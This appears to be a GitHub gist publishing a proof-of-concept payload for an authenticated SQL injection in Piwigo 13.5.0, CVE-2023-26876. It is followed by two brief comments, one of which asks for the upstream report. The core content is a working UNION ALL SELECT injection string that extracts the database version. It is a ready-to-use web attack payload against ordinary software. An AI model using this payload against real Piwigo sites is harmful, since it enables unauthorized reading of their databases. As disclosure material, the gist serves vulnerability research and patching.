@rodnt
Created April 18, 2023 14:03
POC - Authenticated SQL injection Piwigo 13.5.0 - CVE-2023-26876

POC - Authenticated SQL injection Piwigo 13.5.0

Payload: 12 UNION ALL SELECT CONCAT(0x4141414141,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x4141414141)-- --

rodnt commented Apr 18, 2023

sqli-piwigo

ajakk commented Apr 24, 2023

So where's the upstream report?
